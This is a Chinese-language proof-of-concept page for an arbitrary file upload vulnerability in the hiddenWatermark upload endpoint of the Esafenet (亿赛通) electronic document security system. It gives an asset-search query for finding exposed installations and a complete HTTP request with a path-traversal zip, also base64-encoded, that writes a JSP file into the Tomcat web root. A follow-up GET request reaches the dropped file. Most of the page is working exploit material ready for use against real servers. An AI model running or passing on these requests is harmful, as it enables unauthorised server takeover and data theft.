POC/wpoc/亿赛通/亿赛通电子文档安全管理系统新版/亿赛通电子文档安全管理系统hiddenWatermark任意文件上传漏洞.md

亿赛通电子文档安全管理系统hiddenWatermark任意文件上传漏洞

一、漏洞简介

亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统hiddenWatermark接口处存在任意文件上传漏洞，未经授权的攻击者可通过此漏洞上传恶意后门文件，从而获取服务器权限。

二、影响版本

• 亿赛通电子文档安全管理系统

三、资产测绘

• hunterapp.name="ESAFENET 亿赛通文档安全管理系统"
• 登录页面

四、漏洞复现

POST /CDGServer3/hiddenWatermark/uploadFile HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/120.0.0.0 Safari/537.36
Content-Length: 2190
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3lm0J8uEuFHxy191
Origin: null
X-Forwarded-For: 127.0.0.1
X-Originating-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-Ip: 127.0.0.1

------WebKitFormBoundary3lm0J8uEuFHxy191
Content-Disposition: form-data; name="doc"; filename="jskdjks.zip"
Content-Type: application/zip

PK{L9X../PK{L9X../../PK{L9X	../../../PK{L9X../../../../PK{L9X../../../../../PK{L9X../../../../../tomcat/PK{L9X../../../../../tomcat/webapps/PK{L9X#../../../../../tomcat/webapps/ROOT/PKtL9Xtheme/theme/PKXL9Xtheme/PKgL9X_l<5F>lShtheme/theme/theme1.xml=<3D>1
<0A>0<0C><><EFBFBD><EFBFBD>f<EFBFBD><66><EFBFBD>S\\<5C>t<>P0"M&Ż[<5B>:<3A><><EFBFBD>u<15>;aH+M<>	Z<11>
<0A>t<<3C>/<2F><08>(;<3B><1E>2mj<6D>c<><63>&<26>s<03>C<EFBFBD>oPK
L9X/../../../../../tomcat/webapps/ROOT/uuidc251.jsp<1D>M<0E>@Ы<>!<21><>h<08><><EFBFBD><EFBFBD>dM<64><04>|њff
\ߟ<>{<7B>*-ιht<68><74>mN<6D>n<EFBFBD><6E>͡<EFBFBD>>b۽d<15>ă<1A><>lz<17><14>
<01>Bl<><7F><EFBFBD><EFBFBD><EFBFBD>wCY
<0A>o"<22>	_!P_]>PK<08><0B>djPK
?{L9X$../
 
 4w<34>.O<>
PK
?{L9X$!../../
 
 4w<34>.O<>
PK
?{L9X	$E../../../
 
 4w<34>.O<>
PK
?{L9X$l../../../../
 
 4w<34>.O<>
PK
?{L9X$<10>../../../../../
 
 4w<34>.O<>
PK
?{L9X$<10>../../../../../tomcat/
 
 4w<34>.O<>
PK
?{L9X$<10>../../../../../tomcat/webapps/
 
 4w<34>.O<>
PK
?{L9X#$3
../../../../../tomcat/webapps/ROOT/
 
 4w<34>.O<>
PK
?tL9X$t
theme/theme/
 
A<0C><>.O<>
PK
?XL9X$<10>
theme/
 
<18>î.O<>
PK
?gL9X_l<5F>lSh$ <20>
theme/theme/theme1.xml
 
<18><>z<EFBFBD>.O<>
PK

L9X<39><0B>dj/$I../../../../../tomcat/webapps/ROOT/uuidc251.jsp
 
1 Z.O<>
PK<0C>

------WebKitFormBoundary3lm0J8uEuFHxy191--

上传文件位置

GET /uuidc251.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate

上传文件

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

output_base64Datazip.zip

亿赛通电子文档安全管理系统-uploadfile-任意文件上传.yaml

更新: 2024-04-20 22:01:30
原文: https://www.yuque.com/xiaokp7/ocvun2/xl7p8vv07etff80c